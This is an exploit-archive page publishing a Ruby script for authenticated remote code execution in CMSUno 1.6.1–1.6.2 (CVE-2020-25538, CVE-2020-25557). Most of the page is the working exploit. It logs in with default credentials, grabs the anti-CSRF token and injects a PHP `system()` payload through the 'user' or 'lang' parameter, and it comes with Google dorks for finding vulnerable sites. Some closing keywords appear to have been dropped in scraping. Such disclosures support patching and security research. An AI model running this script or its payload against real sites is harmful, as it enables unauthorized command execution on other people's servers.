Home Tools Exploits & CVE's CMSUno 1.6.2 Remote Code Execution

CMSUno 1.6.2 Remote Code Execution

Authored by Alexandre Zanni

CMSUno version 1.6.2 authenticated remote code execution exploit. The original discovery for the vulnerability leveraged is attributed to Fatih Celik in November of 2020.

advisories | CVE-2020-25538, CVE-2020-25557

#!/usr/bin/env ruby

# Exploit
## Title: CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated)
## Google Dorks:
## inurl:uno/central.php
## inurl:uno/config.php
## inurl:uno.php intitle:"CMSUno - Login"
## Author: noraj (Alexandre ZANNI) for SEC-IT (https://secit.fr)
## Author website: https://pwn.by/noraj/
## Date: 2021-01-15
## Vendor Homepage: https://www.boiteasite.fr/cmsuno.html
## Software Link: https://github.com/boiteasite/cmsuno/archive/1.6.2.tar.gz
## Version: 1.6.1, 1.6.2
## Tested on: Bludit
## - 1.6.3 ❌
## - 1.6.2 ✅
## - 1.6.1 ✅
## - 1.6.0 ❌
## - 1.5.7 ❌
## Patch: Update to 1.6.3

# Vulnerabilities
## Discoverer: Fatih Çelik
## Date: 2020/09/30
## Discoverer website: https://fatihhcelik.blogspot.com
## Discovered on CMSUno 1.6.2 and tested on Kali Linux 2020.2
## Vulnerability 1:
## Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)
## CVE: CVE-2020-25557
## References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html
## Vulnerability 2:
## Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)
## CVE: CVE-2020-25538
## References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html

require 'httpclient'
require 'docopt'

# username = 'cmsuno'
# password = '654321'
# root_url = 'http://localhost:5000/'
# command = 'pwd'

doc = <<~DOCOPT
CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated)

#{__FILE__} -r <url> -c <cmd> [-u <username>] [-p <password>] [-t <tech>] [--debug]
#{__FILE__} -H | --help

-r <url>, --root-url <url> Root URL (base path) including HTTP scheme, port and root folder
-u <username>, --user <username> user name (if not default: cmsuno)
-p <password>, --pass <password> User password (if not default: 654321)
-c <cmd>, --command <cmd> Command to execute on the target
-t <tehc>, --technique <tech> Technique: exploiting 'user' param (default, with output) or 'lang' param (blind)
--debug Display arguments
-h, --help Show this screen

#{__FILE__} -r http://example.org -c id
#{__FILE__} -r https://example.org:5000/cmsuno -c 'touch hackproof' -u john -p admin1234 -t lang

# Get anti-CSRF token
def get_unox(client, auth_status)
print '[*] Fetching anti-CSRF token: '
res = client.get(LOGIN_URL)
case auth_status
when false
regexp = /name="unox" value="([a-f0-9]{32}?)"/
when true
regexp = /Unox='([a-f0-9]{32}?)'/
token = regexp.match(res.body).captures[0].chomp
puts token
return token

def login(client, user, pass)
data = {
'unox' => get_unox(client, false),
'user' => user,
'pass' => pass,
puts '[*] Logging in'
res = client.post(LOGIN_URL, data)
return res.body

def exploit(client, user, pass, cmd, tech)
payload = "#{user}";$pass='#{pass}';system('#{cmd}');?>// "
case tech
when 'user'
data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=#{user}&pass0=#{pass}&user=#{payload}&pass=#{pass}&lang=en"
when 'lang'
data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=&pass0=&user=&pass=&lang=#{payload}"
raise 'Wrong exploitation technique argument value'
headers = {
'X-Requested-With' => 'XMLHttpRequest'
#client.proxy = 'http://localhost:8080'
puts "[*] Starting exploitation, using '#{tech}' param technique"
client.post(VULNERABLE_URL, data, headers)
# Login again to trigger uno/password.php
clnt2 = HTTPClient.new
return login(clnt2, user, pass).lines[..-2].join

args = Docopt.docopt(doc)
pp args if args['--debug']

username = args['--user'] || 'cmsuno'
password = args['--pass'] || '654321'
technique = args['--technique'] || 'user'
LOGIN_URL = "#{args['--root-url']}/uno.php"
VULNERABLE_URL = "#{args['--root-url']}/uno/central.php"

clnt = HTTPClient.new
login(clnt, username, password)
output = exploit(clnt, username, password, args['--command'], technique)
print '[*] Command output:'
case technique
when 'user'
puts "n#{output}"
when 'lang'
puts ' blind RCE, no output with this exploitation technique'
rescue Docopt::Exit => e
puts e.message

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